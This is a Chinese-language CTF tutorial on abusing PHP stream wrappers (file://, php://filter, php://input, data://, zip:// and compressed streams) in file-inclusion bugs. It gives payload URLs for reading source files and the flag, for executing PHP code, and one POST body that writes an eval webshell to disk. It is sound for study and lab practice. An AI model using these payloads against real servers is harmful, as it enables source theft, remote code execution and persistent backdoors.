1.file://协议

条件：

allow_url_fopen : off/on
allow_url_include: off/on

作用：

用于访问本地文件系统，在ctf中通常用来读取本地文件

在include() / require() / include_once() / require_once() 参数可控的情况下，即使导入非.php文件，如shell.txt ，依然按照php语法进行解析，这是include()函数所决定的

说明:

file:// 文件系统是php使用的默认封装协议，用于展示本地文件系统。

用法：

/path/to/file.ext
relative/path/to/file.ext
fileInCwd.ext
C:/path/to/winfile.ext
C:\path\to\winfile.ext
\\smbserver\share\path\to\winfile.ext
file:///path/to/file.ext

示例：

1.file://[文件的绝对路径和文件名]

http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

2.file://[文件的相对路径和文件名]

http://127.0.0.1/include.php?file=./phpinfo.txt

3.http://网络位置和文件名

http://127.0.0.1/include.php?file=http://127.0.0.1/phpinfo.txt

2.php://协议

条件：

allow_url_open : off/on
allow_url_include: 仅 php://input  php://stdin php://memory php://temp 需要on

作用：

php:// 访问各个输入/输出流 (I/O streams), 在ctf中经常使用的是 php://filter 和 php://input

php://filter 用于读取源码
php://input 用于执行php代码

说明：

php提供了一些杂项输入/输出(IO)流，允许访问 PHP 的输入输出流，标准输入输出流和错误描述符：

php://filter使用：

php://filter/read=convert.base64-encode/resource=[文件名]

php://input的使用：

http://127.0.0.1/include.php?file=php://input

 [POST DATA部分]
<?php phpinfo(); ?>

写入一句话

http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php fputs(fopen('1juhua.php','w'),'<?php @eval($_GET[cmd]); ?>'); ?>

3.data://协议

作用：

php>=5.2.0 , 可以使用data://数据流封装器，以传递相应格式的数据。通常用来执行php代码

用法：

data://text/plain, ???

如：

http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>

4.zip:// & bzip:// & zlib:// 协议

作用：

zip:// & bzip:// & zlib:// 均属于压缩流，可以访问压缩文件中的子文件，更重要的是不需要指定后缀名，可以修改为任意后缀名，如 jpg，png，gif，xxx等

示例：

1.zip://[压缩文件绝对路径]%23[压缩文件内的子文件文件名](# 的编码为 %23)

压缩 phpinfo.txt 为phpinfo.zip ,压缩包重命名为 phpinfo.jpg ,并上传

http://127.0.0.1/include.php?file=zip://E:\phpStudy\PHPTutorial\WWW\phpinfo.jpg%23phpinfo.txt

2.compress.bzip2://file.bz2

压缩phpinfo.txt 为phpinfo.bz2 并上传（同样支持任意后缀名)

http://127.0.0.1/include.php?file=compress.bzip2://E:\phpStudy\PHPTutorial\WWW\phpinfo.bz2

3.compress.zlib://file.gz

压缩phpinfo.txt 为phpinfo.gz 并上传（支持任意后缀名）

http://127.0.0.1/include.php?file=compress.zlib://E:\phpStudy\PHPTutorial\WWW\phpinfo.gz

总结

在ctf中常用的有data:// , php://input , php://filter ，file://

php://input ，data://用来执行命令
1.php://input 的用法
http://127.0.0.1/include.php?file=php://input
[POST DATA部分]
<?php phpinfo(); ?>
2.data://用法
http://127.0.0.1/include.php?file=data://text/plain,<?php%20phpinfo();?>
php://filter，file://用来读取文件
3.php://filter用法
http://127.0.0.1/include.php?file=php://filter/read=convert.base64-encode/resource=phpinfo.php（读取php文件需要先加密以下才能读出来）
http://127.0.0.1/include.php?file=php://filter/resource=/flag
4.file://用法
http://127.0.0.1/include.php?file=file://E:\phpStudy\PHPTutorial\WWW\phpinfo.txt

免责声明：本站发布的内容（图片、视频和文字）以原创、转载和分享为主，文章观点不代表本网站立场，如果涉及侵权请联系站长邮箱：mmqy2019@163.com进行举报，并提供相关证据，查实之后，将立刻删除涉嫌侵权内容。

猜你喜欢

• workerman无法socket的情况有什么处理方案

  workerman无法socket是因为“stream_socket_server”函数被“php.ini”禁用，解决办法就是打开“php.ini”文件并删除“stream_socket_server”禁用项即可。

• swoole内存存储和管理是怎样的，如何避免内存泄漏

  swoole内存不会越来越大，Server启动后内存管理的底层原理与普通php-cli程序一致。在事件回调函数中，非局部变量的字符串进行拼接操作是必须小心内存泄漏，如 TestClass::$string .= $data，可能会有内存泄漏

• swoole客户端的用处是什么，能解决什么问题呢

  swoole客户端提供了TCP/UDP socket的客户端的封装代码，使用时仅需new Swoole\Client即可。除了普通的同步阻塞+select的使用方法外，Client还支持异步非阻塞回调。

• RabbitMQ持久化表现在几方面，怎样理解

  RabbitMQ的持久化主要体现在三个方面，即交换机持久化，队列持久化及消息持久化注意，因公司使用php-amqplib来实现RabbitMQ，故之后举例说明的代码均使用的php-amqplib，而非php的amqp扩展

• PHP中怎样通过Red实现执行订单支付的定时任务

  PHP中怎样通过Red实现执行订单支付的定时任务？下文有详细的介绍，小编觉得挺实用的，对大家学习或工作或许有帮助，因此分享给大家做个参考，希望大家阅读完这篇文章后可以有所收获。